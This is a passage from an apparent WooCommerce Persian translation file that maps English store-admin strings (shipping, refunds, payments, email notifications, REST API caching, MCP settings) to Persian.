https://example.com/track?id=__PLACEHOLDER__','e.g. https://example.com/icon.png'=>'برای مثال https://example.com/icon.png','Use __PLACEHOLDER__ where the tracking number should appear in the URL.'=>'از __PLACEHOLDER__ در جایی که شماره رهگیری باید در URL ظاهر شود، استفاده کنید.','e.g. my-local-courier'=>'برای مثال my-local-courier','Add shipping provider'=>'افزودن ارائه‌دهنده حمل و نقل','Platform'=>'پلتفرم','Sorry, you are not allowed to do that.'=>'با عرض پوزش، شما اجازه این کار را ندارید.','All Rights Reserved.'=>'تمامی حقوق محفوظ است.','Metadata'=>'فراداده','Device Locale'=>'زبان دستگاه','Device UUID'=>'UUID دستگاه','Find New Customers with Reddit Ads'=>'با Reddit Ads، مشتریان جدید پیدا کنید','Find New Customers with Snapchat Ads'=>'با Snapchat Ads، مشتریان جدید پیدا کنید','Seamlessly sync your products and start Reddit Ads.'=>'محصولات خود را به طور یکپارچه همگام‌سازی کنید و تبلیغات ردیت را شروع کنید.','Reach an untapped audience on Snapchat and drive more sales.'=>'به مخاطبان ناشناخته در اسنپ‌چت دسترسی پیدا کنید و فروش بیشتری داشته باشید.','Reddit Ads'=>'Reddit Ads','Snapchat Ads'=>'Snapchat Ads','Watch on VideoPress'=>'تماشا در VideoPress','There is no connection for %1$s on WooCommerce.com. The connection may have been deleted. To fix this, please reconnect your site to WooCommerce.com to ensure everything works correctly.'=>'هیچ اتصالی برای %1$s در WooCommerce.com وجود ندارد. ممکن است اتصال حذف شده باشد. برای رفع این مشکل، لطفا سایت خود را دوباره به WooCommerce.com متصل کنید تا مطمئن شوید همه چیز به درستی کار می‌کند.','Error loading widget'=>'خطا در بارگیری ابزارک','Loading reviews data...'=>'در حال بارگذاری داده‌های نقد و بررسی...','Font size nameextra-extra-large'=>'خیلی خیلی بزرگ','block titleProduct Gallery'=>'گالری محصول','block descriptionInclude a coupon code to entice customers to make a purchase.'=>'برای ترغیب مشتریان به خرید، یک کد کوپن قرار دهید.','block titleCoupon Code'=>'کد کوپن','Pickup location for %s'=>'محل دریافت حضوری برای %s','Display name of the user who created the refund.'=>'نمایش نام کاربری که استرداد را ایجاد کرده است.','Optional: Taxes refunded for this item. If not provided, tax will be automatically extracted from refund_total using the order\'s tax rates.'=>'اختیاری: مالیات‌های استرداد شده برای این آیتم. اگر ارائه نشود، مالیات به طور خودکار از refund_total با استفاده از نرخ‌های مالیاتی سفارش استخراج می‌شود.','An error occurred while generating the feed.'=>'خطایی هنگام تولید فید رخ داد.','The tracking URL template for the shipping provider.'=>'قالب نشانی اینترنتی رهگیری برای ارائه‌دهنده حمل‌ونقل.','The unique key for the shipping provider.'=>'کلید یکتا برای ارائه‌دهنده حمل‌ونقل.','The icon URL for the shipping provider.'=>'نشانی اینترنتی آیکون برای ارائه‌دهنده حمل‌ونقل.','The display name of the shipping provider.'=>'نام نمایشی ارائه‌دهنده حمل‌ونقل.','Shipping providers'=>'ارائه‌دهندگان حمل‌ونقل','User who created the refund.'=>'کاربری که استرداد را ایجاد کرده است.','Refund total cannot be greater than the line item total including tax (%s).'=>'مجموع استرداد نمی‌تواند بیشتر از مجموع آیتم ردیف شامل مالیات باشد (%s).','Refund amount (%1$s) cannot be less than the total of line items (%2$s).'=>'مبلغ استرداد (%1$s) نمی‌تواند کمتر از مجموع آیتم‌های ردیف (%2$s) باشد.','Currency the order item was created with, in ISO format.'=>'ارزی که آیتم سفارش با آن ایجاد شده است، در فرمت ISO.','Some providers were removed because they are missing required keys (label, icon, value, url).'=>'برخی از ارائه‌دهندگان حذف شدند زیرا کلیدهای مورد نیاز (برچسب، آیکون، مقدار، نشانی) را ندارند.','Updates'=>'به‌روزرسانی‌ها','Scheduled updates enabled'=>'به‌روزرسانی‌های زمان‌بندی‌شده فعال شدند','Scheduled (recommended)'=>'برنامه‌ریزی‌شده (پیشنهادی)','This provides improved performance to your store, enable it in Analytics > Settings.'=>'این کارایی بهبود یافته‌ای را برای فروشگاه شما فراهم می‌کند، آن را در تجزیه و تحلیل > تنظیمات فعال کنید.','REST API Caching'=>'کش کردن REST API','Power your business with N-Genius Online—smart, secure, and built for the future'=>'کسب‌وکارتان را با N-Genius Online قدرت بخشید—هوشمند، امن و ساخته شده برای آینده','Analytics now supports scheduled updates'=>'تجزیه و تحلیل اکنون از بروزرسانی‌های زمان‌بندی شده پشتیبانی می‌کند','Save big with %s'=>'با %s صرفه‌جویی زیادی کنید','Payments made simple with %s'=>'پرداخت‌ها با %s ساده شده‌اند','The quickest way to grow your business by advertising to over 100 million users across Tumblr and WordPress, starting at just \\$5/day.'=>'سریع‌ترین راه برای رشد کسب‌وکارتان با تبلیغ برای بیش از ۱۰۰ میلیون کاربر در تامبلر و وردپرس، شروع فقط از ۵ دلار در روز.','Excludes customers by location (state, country). Provide a comma-separated list of locations. Each location can be a country code (e.g. GB) or combination of country and state (e.g. US:CA).'=>'مشتریان را بر اساس مکان (ایالت، کشور) مستثنی می‌کند. فهرستی از مکان‌ها که با کاما از هم جدا شده‌اند، ارائه دهید. هر مکان می‌تواند یک کد کشور (مانند GB) یا ترکیبی از کشور و ایالت (مانند US:CA) باشد.','Includes customers by location (state, country). Provide a comma-separated list of locations. Each location can be a country code (e.g. GB) or combination of country and state (e.g. US:CA).'=>'شامل مشتریان بر اساس موقعیت مکانی (ایالت، کشور) می‌شود. فهرستی از مکان‌ها که با کاما از هم جدا شده‌اند، ارائه دهید. هر مکان می‌تواند کد کشور (مثلاً GB) یا ترکیبی از کشور و ایالت (مثلاً US:CA) باشد.','Result message.'=>'پیام نتیجه.','Get paid with %s'=>'با %s پول دریافت کنید','Limit result to items with specified user type.'=>'محدود کردن نتایج به موارد با نوع کاربر مشخص شده.','Next scheduled import time (null in immediate mode).'=>'زمان درون‌ریزی زمان‌بندی شده بعدی (در حالت فوری تهی است).','Last processed order date (null in immediate mode).'=>'تاریخ آخرین سفارش پردازش شده (در حالت فوری تهی است).','Current import mode.'=>'حالت درون‌ریزی فعلی.','Manual import is not available in immediate mode. Imports happen automatically.'=>'درون‌ریزی دستی در حالت فوری در دسترس نیست. درون‌ریزی‌ها به طور خودکار انجام می‌شوند.','Sorry, you cannot access analytics imports.'=>'متاسفیم، شما نمی‌توانید به درون‌ریزی‌های تجزیه و تحلیل دسترسی داشته باشید.','The WordPress environment type.'=>'نوع محیط وردپرس.','Order item #%d contains legacy tax data format. Tax rate ID information is unavailable.'=>'آیتم سفارش #%d حاوی فرمت داده‌های مالیاتی قدیمی است. اطلاعات شناسه نرخ مالیات در دسترس نیست.','The current environment type set for this site.'=>'نوع محیط فعلی تنظیم شده برای این سایت.','Environment type'=>'نوع محیط','Limit result set to variations visible in Point of Sale.'=>'محدود کردن مجموعه نتایج به تنوع‌های قابل مشاهده در پایانه فروش (POS).','Tax configuration incomplete'=>'پیکربندی مالیات ناقص است','Send cache control headers and support 304 Not Modified responses'=>'ارسال هدرهای کنترل کش و پشتیبانی از پاسخ‌های 304 Not Modified','Enable cache control headers'=>'فعال‌سازی هدرهای کنترل کش','Cache REST API responses on the server'=>'کش کردن پاسخ‌های REST API روی سرور','Enable backend caching'=>'فعال‌سازی کش سمت سرور','Backend caching requires a WordPress object cache plugin (Redis, Memcached, etc.) to be installed and active. %1$sLearn more about object caching%2$s.'=>'کش سمت سرور نیاز به نصب و فعال بودن یک افزونه کش شیء وردپرس (Redis، Memcached و غیره) دارد. %1$sدرباره کش شیء بیشتر بدانید%2$s.','These settings control backend caching and cache control headers for REST API responses.'=>'این تنظیمات کش سمت سرور و هدرهای کنترل کش را برای پاسخ‌های REST API کنترل می‌کنند.','REST API response cache'=>'کش پاسخ REST API','REST API caching'=>'کش کردن REST API','REST API keys'=>'کلیدهای REST API','This product type is not currently supported.'=>'این نوع محصول در حال حاضر پشتیبانی نمی‌شود.','Available for POS'=>'در دسترس برای POS','No billing email provided.'=>'ایمیل صورت‌حساب ارائه نشده است.','block titleProduct Category Description'=>'توضیح دسته محصول','block descriptionDisplays the current category description.'=>'توضیح دسته فعلی را نمایش می‌دهد.','block descriptionDisplays the current category title and lets permitted users edit it.'=>'عنوان دسته فعلی را نمایش می‌دهد و به کاربران مجاز، اجازه ویرایش آن را می‌دهد.','Content type.'=>'نوع محتوا.','Related links.'=>'پیوندهای مرتبط.','Link type.'=>'نوع پیوند.','URL.'=>'URL.','Message content.'=>'محتوای پیام.','Message type.'=>'نوع پیام.','Messages (info, warnings, errors).'=>'پیام‌ها (اطلاعات، هشدارها، خطاها).','Display text.'=>'نمایش متن.','Canceled order: #%s,'=>'سفارش لغو شده: #%s،','Title.'=>'عنوان.','Latest delivery time (ISO 8601).'=>'آخرین زمان تحویل (ISO 8601).','Earliest delivery time (ISO 8601).'=>'زودترین زمان تحویل (ISO 8601).','No shipping method selected.'=>'هیچ روش ارسالی انتخاب نشده.','Shipping address required.'=>'نشانی ارسال ضروری است.','Product ID must be numeric.'=>'شناسه محصول باید عددی باشد.','Tax in cents.'=>'مالیات به سنت.','Total in cents.'=>'جمع کل به سنت.','Total type.'=>'نوع جمع کل.','Amount in cents.'=>'مبلغ به سنت.','Fulfillment type.'=>'نوع آماده‌سازی سفارش.','Fulfillment option ID.'=>'شناسه گزینه آماده‌سازی سفارش.','Items Discount'=>'تخفیف آیتم‌ها','Items Base Amount'=>'مبلغ پایه آیتم‌ها','Subtitle.'=>'زیرعنوان.','Carrier name.'=>'نام شرکت حمل و نقل.','State/province.'=>'ایالت/استان.','Buyer information.'=>'اطلاعات خریدار.','Payment provider information.'=>'اطلاعات ارائه‌دهنده پرداخت.','List of supported payment methods.'=>'فهرست روش‌های پرداخت پشتیبانی شده.','Payment was declined.'=>'پرداخت رد شد.','No payment gateway available.'=>'درگاه پرداختی در دسترس نیست.','Full name.'=>'نام کامل.','Currency code (ISO 4217).'=>'کد ارزی (ISO 4217).','Payment provider identifier.'=>'شناسه ارائه‌دهنده پرداخت.','Payment token from the payment provider.'=>'توکن پرداخت از ارائه‌دهنده پرداخت.','Payment data including token and provider.'=>'داده پرداخت شامل توکن و ارائه‌دهنده.','Country code (ISO 3166-1 alpha-2).'=>'کد کشور (ISO 3166-1 alpha-2).','Total amount in cents.'=>'مبلغ کل به سنت.','Available fulfillment options.'=>'گزینه‌های موجود برای آماده‌سازی سفارش.','Postal/ZIP code.'=>'کد پستی.','Quantity.'=>'تعداد.','Base amount in cents.'=>'مبلغ پایه به سنت.','Discount amount in cents.'=>'مبلغ تخفیف به سنت.','Subtotal in cents.'=>'جمع جزء به سنت.','Tax amount in cents.'=>'مبلغ مالیات به سنت.','Cannot change locations of "Rest of the World" zone.'=>'نمی‌توان مکان‌های منطقه «بقیه دنیا» را تغییر داد.','Line items to add to the cart.'=>'آیتم‌های ردیف برای افزودن به سبد خرید.','JSON path to the related field.'=>'مسیر JSON به فیلد مرتبط.','Order totals breakdown.'=>'تفکیک مجموع سفارش.','Product item details.'=>'جزئیات آیتم محصول.','Line items in the checkout session.'=>'آیتم‌های ردیف در نشست تسویه‌حساب.','Status of the checkout session.'=>'وضعیت نشست تسویه‌حساب.','Unique identifier for the checkout session.'=>'شناسه یکتا برای نشست تسویه‌حساب.','Checkout session cannot be updated. Current status: %1$s. Allowed statuses: %2$s'=>'نشست تسویه‌حساب قابل بروزرسانی نیست. وضعیت فعلی: %1$s. وضعیت‌های مجاز: %2$s','Checkout session is not ready for payment. Current status: %s'=>'نشست تسویه‌حساب برای پرداخت آماده نیست. وضعیت فعلی: %s','Invalid or expired checkout session ID.'=>'شناسه نشست تسویه‌حساب نامعتبر یا منقضی شده.','The checkout session ID (Cart-Token JWT).'=>'شناسه نشست تسویه‌حساب (Cart-Token JWT).','Settings must be an array.'=>'تنظیمات باید یک آرایه باشد.','Could not update shipping method.'=>'روش ارسال به‌روزرسانی نشد.','Zone name cannot be empty.'=>'نام منطقه نمی‌تواند خالی باشد.','Invalid shipping zone ID.'=>'شناسه منطقه حمل و نقل نامعتبر است.','Invalid shipping method type.'=>'نوع روش حمل و نقل نامعتبر است.','Shipping method does not belong to the specified zone.'=>'روش حمل و نقل، به منطقه تعیین شده تعلق ندارد.','Shipping zone ID.'=>'شناسه منطقه حمل و نقل.','Shipping method settings including title and configuration.'=>'تنظیمات روش حمل و نقل، شامل عنوان و پیکربندی.','Shipping zone location name (readonly, auto-generated from code).'=>'نام مکان منطقه حمل و نقل (فقط خواندنی، تولید خودکار از کد).','Resource cannot be created. Check for validation errors or server logs for details.'=>'منبع قابل ایجاد شدن نیست. برای جزئیات بیشتر، خطاهای اعتبارسنجی یا گزارش‌های سرور را بررسی کنید.','Sorry, you are not allowed to edit product settings.'=>'با عرض پوزش، شما مجاز به ویرایش تنظیمات محصول نیستید.','Invalid weight unit. Valid units are: kg, g, lbs, oz.'=>'واحد وزن نامعتبر است. واحدهای معتبر عبارتند از: kg، g، lbs، oz.','Invalid dimension unit. Valid units are: m, cm, mm, in, yd.'=>'واحد اندازه‌گیری نامعتبر است. واحدهای معتبر عبارتند از: m، cm، mm، in، yd.','Manage product settings including dimensions, weight units, and display options.'=>'تنظیمات محصول شامل ابعاد، واحدهای وزن و گزینه‌های نمایش را مدیریت کنید.','Invalid value for "%1$s". Allowed values: %2$s.'=>'مقدار نامعتبر برای "%1$s". مقادیر مجاز: %2$s.','Cannot change name of "Rest of the World" zone.'=>'نمی‌توان نام منطقه «بقیه دنیا» را تغییر داد.','Cannot change order of "Rest of the World" zone.'=>'نمی‌توان ترتیب منطقه «بقیه دنیا» را تغییر داد.','Manage your store’s tax setup.'=>'مدیریت راه‌اندازی مالیات فروشگاه شما.','Available options for select/radio fields.'=>'گزینه‌های موجود برای فیلدهای انتخاب/رادیویی.','Enable this payment gateway'=>'فعال‌سازی این درگاه پرداخت','Account details must be an array.'=>'جزئیات حساب کاربری باید به صورت یک آرایه باشد.','Bank account details for direct bank transfer.'=>'جزئیات حساب بانکی برای انتقال مستقیم بانکی.','Sorry, you are not allowed to access product settings.'=>'با عرض پوزش، شما اجازه دسترسی به تنظیمات محصول را ندارید.','Determines the display order of payment gateways during checkout.'=>'ترتیب نمایش درگاه‌های پرداخت را در هنگام پرداخت تعیین می‌کند.','Description of the payment method.'=>'توضیح روش پرداخت.','Title of the payment method.'=>'عنوان روش پرداخت','Offline Payment Methods'=>'روش‌های پرداخت آفلاین','Invalid payment gateway ID.'=>'شناسه درگاه پرداخت نامعتبر است.','Available offline payment methods.'=>'روش‌های پرداخت آفلاین، در دسترس است.','Grouped settings for offline payment methods.'=>'تنظیمات گروه‌بندی شده برای روش‌های پرداخت آفلاین.','Title of the settings group.'=>'عنوان گروه تنظیمات.','Description of the settings group.'=>'توضیح گروه تنظیمات.','Manage offline payment methods available for your store.'=>'روش‌های پرداخت آفلاین در دسترس برای فروشگاه خود را مدیریت کنید.','Email title.'=>'عنوان ایمیل.','Email description.'=>'توضیح ایمیل.','Email template ID.'=>'شناسه قالب ایمیل.','Email template not found.'=>'قالب ایمیل پیدا نشد.','Email group title.'=>'عنوان گروه ایمیل.','Available options for selectable fields.'=>'گزینه‌های در دسترس برای فیلدهای قابل انتخاب.','URL for the management link.'=>'URL برای پیوند مدیریت.','Management links for the payment method.'=>'پیوندهای مدیریت برای روش پرداخت.','Management options for the payment method.'=>'گزینه‌های مدیریت برای روش پرداخت.','Current state configuration of the payment method.'=>'پیکربندی وضعیت فعلی روش پرداخت.','Icon URL for the payment method.'=>'URL آیکون برای روش پرداخت.','Unique identifier for the payment method.'=>'شناسه یکتا برای روش پرداخت.','Sorry, you are not allowed to edit general settings.'=>'با عرض پوزش، شما مجاز به ویرایش تنظیمات عمومی نیستید.','Sorry, you are not allowed to access general settings.'=>'با عرض پوزش، شما اجازه دسترسی به تنظیمات عمومی را ندارید.','Invalid email format for %s.'=>'ساختار ایمیل برای %s نامعتبر است.','Email group identifier.'=>'شناسه گروه ایمیل.','Link to template editor.'=>'پیوند به ویرایشگر قالب.','Template post ID.'=>'شناسه پست قالب.','Failed to retrieve updated email settings.'=>'بازیابی تنظیمات ایمیل به‌روزرسانی‌شده ناموفق بود.','Sorry, you are not allowed to edit email settings.'=>'با عرض پوزش، شما مجاز به ویرایش تنظیمات ایمیل نیستید.','Sorry, you are not allowed to access email settings.'=>'با عرض پوزش، شما اجازه دسترسی به تنظیمات ایمیل را ندارید.','Set options relating to customer accounts and data privacy.'=>'گزینه‌های مربوط به حساب‌های کاربری مشتری و حریم خصوصی داده را تنظیم کنید.','Current enabled state for all payment methods.'=>'وضعیت فعال فعلی برای همه روش‌های پرداخت.','Country code to retrieve offline payment methods for.'=>'کد کشور برای بازیابی روش‌های پرداخت آفلاین.','Invalid value for %1$s. Valid options: %2$s'=>'مقدار نامعتبر برای %1$s. گزینه‌های معتبر: %2$s','Invalid option "%2$s" for %1$s.'=>'گزینه نامعتبر "%2$s" برای %1$s.','Accounts & Privacy'=>'حساب‌های کاربری و حریم خصوصی','Tax ID.'=>'شناسه مالیات.','Sorry, you are not allowed to edit account settings.'=>'با عرض پوزش، شما مجاز به ویرایش تنظیمات حساب کاربری نیستید.','Sorry, you are not allowed to access account settings.'=>'با عرض پوزش، شما اجازه دسترسی به تنظیمات حساب کاربری را ندارید.','Amount refunded for this tax.'=>'مبلغ عودت شده این مالیات.','Total refunded for this item.'=>'مجموع عودت این آیتم.','Unique identifier for the refund.'=>'شناسه یکتا برای استرداد.','Quantity refunded.'=>'مبلغ عودت داده شد.','Reason for the refund.'=>'دلیل عودت.','Refund total must be greater than zero.'=>'مجموع عودت باید بیشتر از صفر باشد.','Tax id and refund_total are required.'=>'شناسه مالیات و refund_total الزامی هستند.','The date the refund was created, as GMT.'=>'تاریخی که استرداد ایجاد شد، به وقت GMT.','When true, the payment gateway API is used to perform the refund. If the payment gateway does not support refunds, the refund will fail.'=>'زمانی که صحیح باشد، API درگاه پرداخت برای انجام استرداد استفاده می‌شود. اگر درگاه پرداخت از استرداد پشتیبانی نکند، استرداد ناموفق خواهد بود.','Cannot create order refund.'=>'ایجاد استرداد سفارش امکان‌پذیر نیست.','Refund tax total cannot be greater than the line item tax total (%s).'=>'مجموع مالیات استرداد نمی‌تواند بیشتر از مجموع مالیات آیتم ردیف باشد (%s).','The ID of the order that was refunded.'=>'شناسه سفارشی که استرداد شد.','Currency the refund was created with, in ISO format.'=>'ارزی که استرداد با آن ایجاد شد، در فرمت ISO.','The date the refund was created, in the site\'s timezone.'=>'تاریخی که استرداد ایجاد شد، در منطقه زمانی سایت.','ID of the original line item.'=>'شناسه آیتم ردیف اصلی.','Marks the order as paid. Updates the order status and reduces line item stock if necessary.'=>'سفارش را به عنوان پرداخت شده علامت گذاری می‌کند. وضعیت سفارش را به‌روزرسانی می‌کند و در صورت لزوم موجودی کالا را کاهش می‌دهد.','Total refund amount for the order.'=>'مجموع مبلغ عودت سفارش.','Total refund tax amount for the order.'=>'مجموع مالیات عودت شده سفارش.','Product stock'=>'موجودی محصول','Order confirmation email'=>'ایمیل تاییدیه سفارش','The group of order note.'=>'یادداشت گروه سفارش.','Email notification'=>'آگاه‌سازی‌ ایمیل','Order details sent to %s.'=>'جزئیات سفارش به %s ارسال شد.','Email template "%1$s" sent to %2$s.'=>'قالب ایمیل "%1$s" به %2$s ارسال شد.','Cannot update resource.'=>'نمی‌توان منبع را به‌روزرسانی کرد.','Push Notifications'=>'آگاه‌سازی‌های قابل کلیک (پوش نوتیفیکیشن)','When the customer was last active, as GMT.'=>'زمانی که مشتری آخرین بار فعال بود، به وقت GMT.','When the customer was last active in the site\'s timezone.'=>'زمانی که مشتری آخرین بار در منطقه زمانی سایت فعال بود.','Filter refunds by order ID.'=>'صافی استردادها بر اساس شناسه سفارش.','Message to show the user.'=>'پیامی که به کاربر نمایش داده می‌شود.','Various messages to possibly show the user.'=>'پیام‌های مختلفی که احتمالا به کاربر نشان داده می‌شود.','%s is not supported in the selected business location.'=>'%s در مکان کسب‌وکار انتخاب شده پشتیبانی نمی‌شود.','Successfully updated fulfillment status for %d orders.'=>'وضعیت انجام برای %d سفارش با موفقیت بروزرسانی شد.','. Authorization ID: %1$s not found. Please log into your %2$sPayPal account%3$s to capture the payment'=>'. شناسه مجوز: %1$s یافت نشد. لطفا برای ثبت پرداخت، وارد %2$sحساب کاربری پی‌پال%3$s خود شوید.','Next products'=>'محصولات بعدی','Previous products'=>'محصولات قبلی','Discounts calculated at checkout.'=>'تخفیف‌ها هنگام تسویه حساب محاسبه می‌شوند.','Taxes calculated at checkout.'=>'مالیات‌ها هنگام تسویه حساب محاسبه می‌شوند.','Shipping calculated at checkout.'=>'هزینه حمل و نقل هنگام تسویه حساب محاسبه می‌شود.','Taxes and discounts calculated at checkout.'=>'مالیات‌ها و تخفیف‌ها در هنگام پرداخت محاسبه می‌شوند.','Shipping and discounts calculated at checkout.'=>'هزینه حمل و نقل و تخفیف‌ها هنگام تسویه حساب محاسبه می‌شوند.','Shipping and taxes calculated at checkout.'=>'هزینه حمل و نقل و مالیات‌ها در هنگام پرداخت محاسبه می‌شوند.','fields cannot be empty.'=>'فیلدها نمی‌توانند خالی باشند','Products catalog file URL. Null when catalog is not ready.'=>'URL پرونده کاتالوگ محصولات. وقتی کاتالوگ آماده نباشد، تهی است.','Products catalog generation status.'=>'وضعیت تولید کاتالوگ محصولات.','Product/variation fields to include in the catalog. Can be an array or comma-separated string.'=>'فیلدهای محصول/تنوع برای درج در کاتالوگ. می‌تواند یک آرایه یا رشته جدا شده با کاما باشد.','Finish checkout'=>'تکمیل خرید','fields must be an array of strings or a comma-separated string.'=>'فیلدها باید آرایه‌ای از رشته‌ها یا رشته‌ای جدا شده با کاما باشند.','Failed to generate catalog file.'=>'تولید پرونده کاتالوگ ناموفق بود.','Your PayPal account has been restricted by PayPal. This may prevent customers from completing payments. Please %1$scontact PayPal support%2$s to resolve this issue and restore full functionality to your account.'=>'حساب کاربری پی‌پال شما توسط پی‌پال محدود شده است. این ممکن است مانع از تکمیل پرداخت‌های مشتریان شود. لطفا برای حل این مشکل و بازیابی کامل عملکرد حساب کاربری خود، %1$sبا پشتیبانی پی‌پال تماس بگیرید%2$s.','PayPal Account Restricted'=>'حساب کاربری پی‌پال محدود شده','PayPal Standard does not support your store currency (%s).'=>'پی‌پال استاندارد از واحد پول فروشگاه شما (%s) پشتیبانی نمی‌کند.','Sandbox mode enabled. Only sandbox test accounts can be used. See the PayPal Sandbox Testing Guide for more details.'=>'حالت سندباکس فعال شد. تنها حساب‌های تست سندباکس قابل استفاده هستند. برای جزئیات بیشتر راهنمای تست سندباکس پی‌پل را ببینید.','Shown as a preview in the Inbox, next to the subject line. (Max 150 characters).'=>'به عنوان پیش‌نمایش در صندوق ایمیل، بعد از موضوع ایمیل نمایش داده می‌شود. (حداکثر ۱۵۰ کاراکتر).','Notifies customers when their order has been partially or fully refunded.'=>'به مشتریان اطلاع می‌دهد که همه یا بخشی از وجه سفارش آنها مسترد شده است.','Notifies admins when an order that was processing or on hold has failed.'=>'وقتی سفارشی که در حال پردازش یا در حالت انتظار بود، ناموفق باشد، به مدیران اطلاع می‌دهد.','Notifies admins when a new order has been placed.'=>'وقتی که سفارش جدیدی ثبت شود، به مدیران اطلاع می‌دهد.','Order changes'=>'تغییرات سفارش','Preheader'=>'پیش‌سربرگ','POS order refunded'=>'سفارش POS مسترد شد','POS order complete'=>'سفارش POS تکمیل شد','Notifies customers when their in-person (POS) order has been completed.'=>'به مشتریان اطلاع می‌دهد که سفارش حضوری (POS) آنها تکمیل شده است.','Notifies customers when a full or partial refund has been issued for their in-person (POS) order.'=>'به مشتریان اطلاع می‌دهد که همه یا بخشی از وجه سفارش حضوری (POS) آنها مسترد شده است.','Notifies customers when their order has been received and is being processed.'=>'به مشتریان اطلاع می‌دهد که سفارش آنها دریافت شده و در حال پردازش است.','Order on hold'=>'سفارش در انتظار','Notifies customers when you’ve added a note to their order.'=>'وقتی یادداشتی به سفارش مشتریان اضافه کردید، به آنها اطلاع می‌دهد.','Account password reset'=>'تنظیم دوباره کلمه عبور حساب کاربری','Notifies customers when their password has been reset.'=>'به مشتریان اطلاع می‌دهد که چه زمانی رمز عبورشان بازنشانی شده است.','Payment request'=>'درخواست پرداخت','Account created'=>'حساب کاربری ایجاد شد','Customer note added'=>'یادداشت مشتری اضافه شد','Notifies customers when their account has been created.'=>'به مشتریان اطلاع می‌دهد که حساب کاربری‌شان ایجاد شده است.','Notifies customers when their order has failed.'=>'به مشتریان اطلاع می‌دهد که سفارش آنها ناموفق بوده است.','Canceled order'=>'سفارش لغو شده','Payment complete.'=>'پرداخت تکمیل شد.','Notifies customers when their order has been shipped.'=>'به مشتریان اطلاع می‌دهد که سفارش آنها ارسال شده است.','Notifies customers when their order has been cancelled.'=>'به مشتریان اطلاع می‌دهد که سفارش آنها لغو شده است.','Notifies admins when an order that was processing or on hold has been canceled.'=>'وقتی سفارشی که در حال پردازش یا در حالت انتظار بود لغو شود، به مدیران اطلاع می‌دهد.','Payment via %1$s (%2$s).'=>'پرداخت از طریق %1$s (%2$s).','Please choose product options for %1$s.'=>'لطفا گزینه‌های محصول را برای %1$s انتخاب کنید.','You do not have permission to save settings.'=>'شما اجازه ذخیره تنظیمات را ندارید.','Add a different email address to receive replies.'=>'برای دریافت پاسخ‌ها، یک نشانی ایمیل متفاوت اضافه کنید.','Manually send customers an email to review their order and complete payment.'=>'ارسال دستی ایمیل به مشتریان برای بازبینی سفارش و تکمیل پرداخت.','block descriptionDisplays the description of the selected variation.'=>'توضیحات مربوط به تنوع انتخاب شده را نمایش می‌دهد.','block titleVariation Description (Beta)'=>'توضیح تنوع (بتا)','Product or variation ID.'=>'شناسه محصول یا تنوع.','Product is virtual.'=>'محصول مجازی است.','Item name.'=>'نام مورد.','Product permalink.'=>'پیوند یکتای محصول.','Product is downloadable.'=>'محصول قابل دانلود است.','Product needs shipping.'=>'محصول نیاز به ارسال دارد.','Trash not supported.'=>'زباله‌دان پشتیبانی نمی‌شود.','Cannot trash resource.'=>'نمی‌توان منبع را به زباله‌دان منتقل کرد.','Cannot delete resource.'=>'نمی‌توان منبع را حذف کرد.','Cannot create resource.'=>'نمیشه منبع ایجاد کرد.','Resource already exists.'=>'منبع از قبل وجود دارد.','Item price. Calculated as total / quantity.'=>'قیمت کالا. به صورت جمع کل / تعداد محاسبه می‌شود.','Product global unique ID.'=>'شناسه منحصر به فرد جهانی محصول.','A list of line items (products) within this order.'=>'فهرستی از اقلام (محصولات) موجود در این سفارش.','Unique identifier for the shipping zone.'=>'شناسه منحصر به فرد برای منطقه حمل و نقل.','Shipping methods for this zone.'=>'روش‌های ارسال برای این منطقه','This item is not available for purchase.'=>'این کالا برای خرید موجود نیست.','The order ID that notes belong to.'=>'شناسه سفارشی که یادداشت‌ها به آن تعلق دارند.','An error occurred while processing your request.'=>'در فرآیند درخواست شما خطایی رخ داده است.','Authentication failed.'=>'تأیید هویت ناموفق بود.','If true, the note will be shown to customers. If false, the note will be for admin reference only.'=>'اگر مقدار true باشد، یادداشت به مشتریان نمایش داده می‌شود. اگر false باشد، یادداشت فقط برای ارجاع مدیر خواهد بود.','The fulfillment status of the order.'=>'وضعیت انجام (fulfillment) سفارش.','Limit result set to orders with specific fulfillment statuses.'=>'محدود کردن مجموعه نتایج به سفارش‌هایی با وضعیت‌های انجام (fulfillment) خاص.','Shipping method ID (e.g., flat_rate, free_shipping).'=>'شناسه روش ارسال (مثلا: flat_rate، free_shipping).','X-MCP-API-Key must be in format consumer_key:consumer_secret'=>'X-MCP-API-Key باید با ساختار consumer_key:consumer_secret باشد.','The user associated with this API key no longer exists.'=>'کاربر مربوط به این کلید API دیگر وجود ندارد.','Order ID the note belongs to.'=>'شناسه سفارشی که یادداشت به آن تعلق دارد.','Configuration Required'=>'پیکربندی الزامی است','Configure Permalinks'=>'پیکربندی پیوندهای یکتا','Clear Customer Sessions When Empty'=>'پاک‌سازی جلسات مشتری در صورت خالی بودن','HTTPS is required for MCP requests.'=>'برای درخواست‌های MCP فعال بودن HTTPS الزامی است.','X-MCP-API-Key header required. Format: consumer_key:consumer_secret'=>'سربرگ X-MCP-API-Key لازم است. ساختار: consumer_key:consumer_secret','Enable WooCommerce MCP (Model Context Protocol) for AI-powered store operations. AI-generated results and actions can be unpredictable - please review before executing in your store.'=>'WooCommerce MCP (پروتکل زمینه مدل) را برای عملیات فروشگاه قدرت گرفته از هوش مصنوعی فعال کنید. نتایج و اقدامات تولید شده توسط هوش مصنوعی ممکن است غیرقابل پیش‌بینی باشند – لطفا قبل از اجرا در فروشگاه خود، بررسی کنید.','WooCommerce MCP'=>'WooCommerce MCP','WooCommerce MCP Server'=>'سرور WooCommerce MCP','Create Order'=>'ایجاد سفارش','Update Order'=>'به‌روزرسانی سفارش','Get Order'=>'دریافت سفارش','List Orders'=>'فهرست سفارشات','Permanently delete a product from the store. This action cannot be undone.'=>'حذف دائمی یک محصول از فروشگاه. این اقدام قابل بازگشت نیست.','Delete Product'=>'حذف محصول','Update Product'=>'به‌روزرسانی محصول','Get Product'=>'دریافت محصول','List Products'=>'فهرست محصولات','Watch on YouTube'=>'تماشا در یوتیوب','Listen on ReverbNation'=>'شنیدن در ReverbNation','Listen on Mixcloud'=>'شنیدن در Mixcloud','Listen on Pocket Casts'=>'شنیدن در Pocket Casts','Listen on SoundCloud'=>'شنیدن در ساندکلاد','Listen on Spotify'=>'شنیدن در اسپاتیفای','Please select a valid quantity to add to the cart.'=>'لطفا تعداد معتبری را برای افزودن به سبد خرید انتخاب کنید.','Available options for select/multiselect fields.'=>'گزینه‌های موجود برای فیلدهای انتخابی/چندگزینه‌ای.','Play'=>'پخش','Set your store\'s address, visibility, currency, language, and timezone.'=>'آدرس، قابل مشاهده بودن، واحد پول، زبان و منطقه‌ی زمانی فروشگاه خود را تنظیم 